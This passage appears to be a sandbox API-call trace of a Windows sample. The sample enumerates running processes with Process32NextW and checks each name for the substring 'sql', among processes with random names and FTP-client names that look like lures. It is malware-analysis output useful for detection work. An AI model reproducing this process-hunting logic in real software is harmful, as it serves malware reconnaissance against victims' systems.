cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0176.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0176.652] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3595a28 [0176.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3595a28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0176.653] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0176.653] StrStrIA (lpFirst="swing prefer.exe", lpSrch="sql") returned 0x0 [0176.653] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0176.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0176.654] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3586340 [0176.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x3586340, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0176.654] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0176.654] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="sql") returned 0x0 [0176.654] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0176.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0176.655] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3595a48 [0176.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3595a48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0176.655] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0176.655] StrStrIA (lpFirst="nights-attending.exe", lpSrch="sql") returned 0x0 [0176.655] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0176.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0176.657] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3584f10 [0176.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3584f10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0176.657] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0176.657] StrStrIA (lpFirst="installed.exe", lpSrch="sql") returned 0x0 [0176.657] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0176.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0176.658] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x35862a0 [0176.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x35862a0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0176.658] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0176.658] StrStrIA (lpFirst="references compounds.exe", lpSrch="sql") returned 0x0 [0176.658] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0176.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0176.659] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35957a8 [0176.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x35957a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0176.659] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0176.659] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="sql") returned 0x0 [0176.659] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0176.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0176.661] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35956c8 [0176.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x35956c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0176.661] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0176.661] StrStrIA (lpFirst="registered try.exe", lpSrch="sql") returned 0x0 [0176.661] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0176.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0176.662] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3586278 [0176.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x3586278, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0176.662] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0176.662] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="sql") returned 0x0 [0176.662] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0176.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0176.663] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3584f70 [0176.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3584f70, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0176.663] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0176.663] StrStrIA (lpFirst="invite.exe", lpSrch="sql") returned 0x0 [0176.663] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0176.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0176.665] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3584ec8 [0176.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3584ec8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0176.665] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0176.665] StrStrIA (lpFirst="idol.exe", lpSrch="sql") returned 0x0 [0176.665] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0176.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0176.666] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x35861d8 [0176.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x35861d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0176.666] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0176.666] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="sql") returned 0x0 [0176.666] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0176.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0176.667] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3586200 [0176.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x3586200, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0176.667] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0176.667] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="sql") returned 0x0 [0176.667] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0176.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0176.669] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35850c0 [0176.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x35850c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0176.669] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0176.669] StrStrIA (lpFirst="powell_jane.exe", lpSrch="sql") returned 0x0 [0176.669] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0176.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0176.670] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3595728 [0176.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x3595728, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0176.670] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0176.670] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="sql") returned 0x0 [0176.670] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0176.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0176.671] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35850d8 [0176.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x35850d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0176.671] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0176.671] StrStrIA (lpFirst="gainedshape.exe", lpSrch="sql") returned 0x0 [0176.671] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0176.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0176.672] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35958a8 [0176.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x35958a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0176.673] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0176.673] StrStrIA (lpFirst="opens-versions.exe", lpSrch="sql") returned 0x0 [0176.673] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0176.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0176.674] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x35862f0 [0176.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x35862f0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0176.674] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0176.674] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="sql") returned 0x0 [0176.701] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0176.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.703] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3584e68 [0176.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3584e68, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0176.703] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0176.703] StrStrIA (lpFirst="3dftp.exe", lpSrch="sql") returned 0x0 [0176.703] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0176.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0176.704] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3595808 [0176.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3595808, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0176.704] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0176.704] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="sql") returned 0x0 [0176.704] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0176.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.706] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3584e80 [0176.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3584e80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0176.706] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0176.706] StrStrIA (lpFirst="alftp.exe", lpSrch="sql") returned 0x0 [0176.706] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0176.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.707] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3584ee0 [0176.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3584ee0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0176.707] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0176.707] StrStrIA (lpFirst="barca.exe", lpSrch="sql") returned 0x0 [0176.707] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0176.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.708] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3585390 [0176.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3585390, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0176.708] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0176.708] StrStrIA (lpFirst="bitkinex.exe", lpSrch="sql") returned 0x0 [0176.708] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0176.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.710] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35851f8 [0176.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x35851f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0176.710] lstrcpyA (in: 